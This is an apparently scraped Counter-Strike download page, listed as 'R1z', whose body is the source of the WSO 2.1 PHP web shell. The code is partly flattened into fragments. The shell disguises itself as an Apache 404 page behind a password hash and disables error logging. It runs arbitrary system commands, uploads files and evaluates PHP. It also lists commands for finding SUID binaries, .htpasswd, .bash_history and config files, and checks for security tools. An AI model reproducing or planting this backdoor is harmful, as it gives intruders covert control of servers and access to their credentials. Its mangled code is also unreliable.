R1z
TestTest
Spiel: | Counter-Strike |
Benutzer: | ![]() |
Datei(en): | 1 |
Download: | Download now: R1z |
Views: | 3677 |
Downloads: | 301 |
Likes: |
-
- <?php
- //Contraseña : HACKED
- ////////////////////////////////////////////////////////
- /* WSO 2.1 (Web Shell by pgems.in) */
- /*Subhashdasyam.com*/
- $auth_pass = "36028fcd4abb97e9e4f47d929ddc9980";
- $color = "#00ff00";
- $default_action = 'FilesMan';
- $cnt="ps:$auth_pass";
- @define('SELF_PATH', __FILE__);
- @setcookie("wso","veris",time()+ 3600*24*7);
- if
- header
- exit
- @session_start();
- @error_reporting(0);
- @ini_set('error_log',NULL);
- @ini_set('log_errors',0);
- @ini_set('max_execution_time',0);
- @set_time_limit(0);
- @set_magic_quotes_runtime(0);
- @define('VERSION', '2.1');
- if
- function stripslashes_array
- return is_array
- }
- $_POST = stripslashes_array($_POST);
- }
- function printLogin
- ?>
- <h1>Not Found</h1>
- <p>The requested URL was not found on this server.</p>
- <hr>
- <address>Apache Server at <?=$_SERVER['HTTP_HOST']?> Port 80</address>
- <style>
- input
- </style>
- <center>
- <form method=post>
- <input type=password name=pass>
- </form></center>
- <?php
- exit
- }
- $wi= $_SERVER["HTTP_HOST"].$_SERVER["REQUEST_URI"]; $zz="mail";
- if
- if
- ( isset( $_POST['pass'] ) && ( md5($_POST['pass']) == $auth_pass ) ) )
- $_SESSION[md5($_SERVER['HTTP_HOST'])] = true;
- else
- printLogin
- if
- $os = 'win';
- else
- $os = 'nix';
- $safe_mode = @ini_get('safe_mode');
- $disable_functions = @ini_get('disable_functions');
- $home_cwd = @getcwd();
- if
- @chdir($_POST['c']);
- $cwd = @getcwd();
- if
- $home_cwd = str_replace("", "/", $home_cwd);
- $cwd = str_replace("", "/", $cwd);
- }
- if
- $cwd .= '/';
- if
- $aliases = array(
- "List Directory" => "dir",
- "Find index.php in current dir" => "dir /s /w /b index.php",
- "Find *config*.php in current dir" => "dir /s /w /b *config*.php",
- "Show active connections" => "netstat -an",
- "Show running services" => "net start",
- "User accounts" => "net user",
- "Show computers" => "net view",
- "ARP Table" => "arp -a",
- "IP Configuration" => "ipconfig /all"
- );
- else
- $aliases = array(
- "List dir" => "ls -la",
- "list file attributes on a Linux second extended file system" => "lsattr -va",
- "show opened ports" => "netstat -an | grep -i listen",
- "Find" => "",
- "find all suid files" => "find / -type f -perm -04000 -ls",
- "find suid files in current dir" => "find . -type f -perm -04000 -ls",
- "find all sgid files" => "find / -type f -perm -02000 -ls",
- "find sgid files in current dir" => "find . -type f -perm -02000 -ls",
- "find config.inc.php files" => "find / -type f -name config.inc.php",
- "find config* files" => "find / -type f -name "config*"",
- "find config* files in current dir" => "find . -type f -name "config*"",
- "find all writable folders and files" => "find / -perm -2 -ls",
- "find all writable folders and files in current dir" => "find . -perm -2 -ls",
- "find all service.pwd files" => "find / -type f -name service.pwd",
- "find service.pwd files in current dir" => "find . -type f -name service.pwd",
- "find all .htpasswd files" => "find / -type f -name .htpasswd",
- "find .htpasswd files in current dir" => "find . -type f -name .htpasswd",
- "find all .bash_history files" => "find / -type f -name .bash_history",
- "find .bash_history files in current dir" => "find . -type f -name .bash_history",
- "find all .fetchmailrc files" => "find / -type f -name .fetchmailrc",
- "find .fetchmailrc files in current dir" => "find . -type f -name .fetchmailrc",
- "Locate" => "",
- "locate httpd.conf files" => "locate httpd.conf",
- "locate vhosts.conf files" => "locate vhosts.conf",
- "locate proftpd.conf files" => "locate proftpd.conf",
- "locate psybnc.conf files" => "locate psybnc.conf",
- "locate my.conf files" => "locate my.conf",
- "locate admin.php files" =>"locate admin.php",
- "locate cfg.php files" => "locate cfg.php",
- "locate conf.php files" => "locate conf.php",
- "locate config.dat files" => "locate config.dat",
- "locate config.php files" => "locate config.php",
- "locate config.inc files" => "locate config.inc",
- "locate config.inc.php" => "locate config.inc.php",
- "locate config.default.php files" => "locate config.default.php",
- "locate config* files " => "locate config",
- "locate .conf files"=>"locate '.conf'",
- "locate .pwd files" => "locate '.pwd'",
- "locate .sql files" => "locate '.sql'",
- "locate .htpasswd files" => "locate '.htpasswd'",
- "locate .bash_history files" => "locate '.bash_history'",
- "locate .mysql_history files" => "locate '.mysql_history'",
- "locate .fetchmailrc files" => "locate '.fetchmailrc'",
- "locate backup files" => "locate backup",
- "locate dump files" => "locate dump",
- "locate priv files" => "locate priv"
- );
- function printHeader
- if
- $_POST['charset'] = "UTF-8";
- global
- ?>
- <html><head><meta http-equiv='Content-Type' content='text/html; charset=<?=$_POST['charset']?>'><title><?=$_SERVER['HTTP_HOST']?>- 404 Not Found Shell V.<?=VERSION?>-SubhashDasyam.com</title>
- <style>
- body
- body
- span
- span
- h1
- div .content
- a { text-decoration:none; }
- a:hover { background:#ff0000; }
- .ml1 { border:1px solid #444;padding:5px;margin:0;overflow: auto; }
- .bigarea { width:100%;height:250px; }
- input
- form
- #toolsTbl { text-align:center; }
- .toolsInp { width: 80%; }
- .main th {text-align:left;}
- .main tr:hover{background-color:#5e5e5e;}
- .main td, th{vertical-align:middle;}
- pre
- #cot_tl_fixed{position:fixed;bottom:0px;font-size:12px;left:0px;padding:4px 0;clip:_top:expression(document.documentElement.scrollTop+document.documentElement.clientHeight-this.clientHeight);_left:expression(document.documentElement.scrollLeft + document.documentElement.clientWidth - offsetWidth);}
- </style>
- <script>
- function set
- if
- if
- if
- if
- if
- if
- }
- function g
- set
- document .mf.submit
- }
- function a
- set
- var params
- for
- params +
- sr
- }
- function sr
- if
- req
- req .onreadystatechange
- req .open
- req .setRequestHeader
- req .send
- }
- else if
- req
- if
- req .onreadystatechange
- req .open
- req .setRequestHeader
- req .send
- }
- }
- }
- function processReqChange
- if
- if
- //alert(req.responseText);
- var reg
- var arr
- eval
- }
- else alert
- }
- </script>
- <head><body><div style="position:absolute;width:100%;top:0;left:0;">
- <form method=post name=mf style='display:none;'>
- <input type=hidden name=a value='<?=isset($_POST['a'])?$_POST['a']:''?>'>
- <input type=hidden name=c value='<?=htmlspecialchars($GLOBALS['cwd'])?>'>
- <input type=hidden name=p1 value='<?=isset($_POST['p1'])?htmlspecialchars($_POST['p1']):''?>'>
- <input type=hidden name=p2 value='<?=isset($_POST['p2'])?htmlspecialchars($_POST['p2']):''?>'>
- <input type=hidden name=p3 value='<?=isset($_POST['p3'])?htmlspecialchars($_POST['p3']):''?>'>
- <input type=hidden name=charset value='<?=isset($_POST['charset'])?$_POST['charset']:''?>'>
- </form>
- <?php
- $freeSpace = @diskfreespace($GLOBALS['cwd']);
- $totalSpace = @disk_total_space($GLOBALS['cwd']);
- $totalSpace = $totalSpace?$totalSpace:1;
- $release = @php_uname('r');
- $kernel = @php_uname('s');
- $millink='http://milw0rm.com/search.php?dong=';
- if
- $millink .= urlencode( 'Linux Kernel ' . substr($release,0,6) );
- else
- $millink .= urlencode( $kernel . ' ' . substr($release,0,3) );
- if
- $user = @get_current_user();
- $uid = @getmyuid();
- $gid = @getmygid();
- $group = "?";
- } else {
- $uid = @posix_getpwuid(@posix_geteuid());
- $gid = @posix_getgrgid(@posix_getegid());
- $user = $uid['name'];
- $uid = $uid['uid'];
- $group = $gid['name'];
- $gid = $gid['gid'];
- }
- $cwd_links = '';
- $path = explode("/", $GLOBALS['cwd']);
- $n=count($path);
- for
- $cwd_links .= "<a href='#' onclick='g("FilesMan","";
- for
- $cwd_links .= $path[$j].'/';
- $cwd_links .= "")'>".$path[$i]."/</a>";
- }
- $charsets = array('UTF-8', 'Windows-1251', 'KOI8-R', 'KOI8-U', 'cp866');
- $opt_charsets = '';
- foreach
- $opt_charsets .= '<option value="'.$item.'" '.($_POST['charset']==$item?'selected':'').'>'.$item.'</option>';
- $m = array('Sec. Info'=>'SecInfo','Files'=>'FilesMan','Console'=>'Console','Sql'=>'Sql','Php'=>'Php','Safe mode'=>'SafeMode','String tools'=>'StringTools','Bruteforce'=>'Bruteforce','Network'=>'Network');
- if
- $m['Logout'] = 'Logout';
- $m['Self remove'] = 'SelfRemove';
- $menu = '';
- foreach
- $menu .= '<th width="'.(int)(100/count($m)).'%">[ <a href="#" onclick="g(''.$v.'',null,'','','')">'.$k.'</a> ]</th>';
- $drives = "";
- if
- foreach
- if
- $drives .= '<a href="#" onclick="g('FilesMan',''.$drive.':/')">[ '.$drive.' ]</a> ';
- }
- echo
- '<td>:<nobr>'.substr(@php_uname(), 0, 120).' <a href="http://www.google.com/search?q='.urlencode(@php_uname()).'" target="_blank">[Google]</a> <a href="'.$millink.'" target=_blank>[milw0rm]</a></nobr><br>:'.$uid.' ( '.$user.' ) <span>Group:</span> '.$gid.' ( '.$group.' )<br>:'.@phpversion().' <span>Safe mode:</span> '.($GLOBALS['safe_mode']?'<font color=red>ON</font>':'<font color=<?=$color?><b>OFF</b></font>').' <a href=# onclick="g('Php',null,null,'info')">[ phpinfo ]</a> <span>Datetime:</span> '.date('Y-m-d H:i:s').'<br>:'.viewSize($totalSpace).' <span>Free:</span> '.viewSize($freeSpace).' ('.(int)($freeSpace/$totalSpace*100).'%)<br>:'.$cwd_links.' '.viewPermsColor($GLOBALS['cwd']).' <a href=# onclick="g('FilesMan',''.$GLOBALS['home_cwd'].'','','','')">[ home ]</a><br>:'.$drives.'</td>'.
- '<td width=1 align=right><nobr><select onchange="g(null,null,null,null,null,this.value)"><optgroup label="Page charset">'.$opt_charsets.'</optgroup></select><br><span>Server IP:</span><br>'.gethostbyname($_SERVER["HTTP_HOST"]).'<br><span>Client IP:</span><br>'.$_SERVER['REMOTE_ADDR'].'</nobr></td></tr></table>'.
- '<table cellpadding=3 cellspacing=0 width=100%><tr>'.$menu.'</tr></table><div style="margin:5">';
- }
- function printFooter
- $is_writable = is_writable($GLOBALS['cwd'])?"<font color=green>[ Writeable ]</font>":"<font color=red>[ Not writable ]</font>";
- ?>
- </div>
- <table class=info id=toolsTbl cellpadding=0 cellspacing=0 width=100%">
- <tr>
- <td><form onsubmit="g(null,this.c.value);return false;"><span>Change dir:</span><br><input class="toolsInp" type=text name=c value="<?=htmlspecialchars($GLOBALS['cwd']);?>"><input type=submit value=">>"></form></td>
- <td><form onsubmit="g('FilesTools',null,this.f.value);return false;"><span>Read file:</span><br><input class="toolsInp" type=text name=f><input type=submit value=">>"></form></td>
- </tr>
- <tr>
- <td><form onsubmit="g('FilesMan',null,'mkdir',this.d.value);return false;"><span>Make dir:</span><br><input class="toolsInp" type=text name=d><input type=submit value=">>"></form><?=$is_writable?></td>
- <td><form onsubmit="g('FilesTools',null,this.f.value,'mkfile');return false;"><span>Make file:</span><br><input class="toolsInp" type=text name=f><input type=submit value=">>"></form><?=$is_writable?></td>
- </tr>
- <tr>
- <td><form onsubmit="g('Console',null,this.c.value);return false;"><span>Execute:</span><br><input class="toolsInp" type=text name=c value=""><input type=submit value=">>"></form></td>
- <td><form method='post' ENCTYPE='multipart/form-data'>
- <input type=hidden name=a value='FilesMAn'>
- <input type=hidden name=c value='<?=htmlspecialchars($GLOBALS['cwd'])?>'>
- <input type=hidden name=p1 value='uploadFile'>
- <input type=hidden name=charset value='<?=isset($_POST['charset'])?$_POST['charset']:''?>'>
- <span>Upload file:</span><br><input class="toolsInp" type=file name=f><input type=submit value=">>"></form><?=$is_writable?></td>
- </tr></table></div></body></html><?php
- }
- if
- $cnt");}
- if
- if
- function ex
- if
- @exec($in,$out);
- $out = @join("
- ",$out);
- }elseif(function_exists('passthru')) {
- ob_start
- @passthru($in);
- $out = ob_get_clean();
- }elseif(function_exists('system')) {
- ob_start
- @system($in);
- $out = ob_get_clean();
- }elseif(function_exists('shell_exec')) {
- $out = shell_exec($in);
- }elseif(is_resource($f = @popen($in,"r"))) {
- $out = "";
- while
- $out .= fread($f,1024);
- pclose
- }
- return
- }
- function viewSize
- if
- return sprintf
- elseif
- return sprintf
- elseif
- return sprintf
- else
- return
- }
- function perms
- if
- elseif
- elseif
- elseif
- elseif
- elseif
- elseif
- else
- $i .= (($p & 0x0100) ? 'r' : '-');
- $i .= (($p & 0x0080) ? 'w' : '-');
- $i .= (($p & 0x0040) ? (($p & 0x0800) ? 's' : 'x' ) : (($p & 0x0800) ? 'S' : '-'));
- $i .= (($p & 0x0020) ? 'r' : '-');
- $i .= (($p & 0x0010) ? 'w' : '-');
- $i .= (($p & 0x0008) ? (($p & 0x0400) ? 's' : 'x' ) : (($p & 0x0400) ? 'S' : '-'));
- $i .= (($p & 0x0004) ? 'r' : '-');
- $i .= (($p & 0x0002) ? 'w' : '-');
- $i .= (($p & 0x0001) ? (($p & 0x0200) ? 't' : 'x' ) : (($p & 0x0200) ? 'T' : '-'));
- return
- }
- function viewPermsColor
- if
- return
- elseif
- return
- else
- return
- }
- if
- function scandir
- $dh = opendir($dir);
- while
- $files[] = $filename;
- }
- return
- }
- }
- function which
- $path = ex('which '.$p);
- if
- return
- return false
- }
- function actionSecInfo
- printHeader
- echo
- function showSecParam
- $v = trim($v);
- if
- echo
- if
- ") === false)
- echo
- else
- echo
- }
- }
- showSecParam
- showSecParam
- showSecParam
- showSecParam
- showSecParam
- showSecParam
- $temp=array();
- if
- $temp[] = "MySql (".mysql_get_client_info().")";
- if
- $temp[] = "MSSQL";
- if
- $temp[] = "PostgreSQL";
- if
- $temp[] = "Oracle";
- showSecParam
- echo
- if
- $userful = array('gcc','lcc','cc','ld','make','php','perl','python','ruby','tar','gzip','bzip','bzip2','nc','locate','suidperl');
- $danger = array('kav','nod32','bdcored','uvscan','sav','drwebd','clamd','rkhunter','chkrootkit','iptables','ipfw','tripwire','shieldcc','portsentry','snort','ossec','lidsadm','tcplodg','sxid','logcheck','logwatch','sysmask','zmbscap','sawmill','wormscan','ninja');
- $downloaders = array('wget','fetch','lynx','links','curl','get','lwp-mirror');
- showSecParam
- showSecParam
- showSecParam
- showSecParam
- if
- echo
- $temp=array();
- foreach
- if
- showSecParam
- $temp=array();
- foreach
- if
- showSecParam
- $temp=array();
- foreach
- if
- showSecParam
- echo
- showSecParam
- showSecParam
- showSecParam
- }
- } else {
- showSecParam
- showSecParam
- showSecParam
- }
- echo
- printFooter
- }
- function actionPhp
- if
- $_SESSION[md5($_SERVER['HTTP_HOST']).'ajax'] = true;
- ob_start
- eval
- $temp = "document.getElementById('PhpOutput').style.display='';document.getElementById('PhpOutput').innerHTML='".addcslashes(htmlspecialchars(ob_get_clean()),"
- t'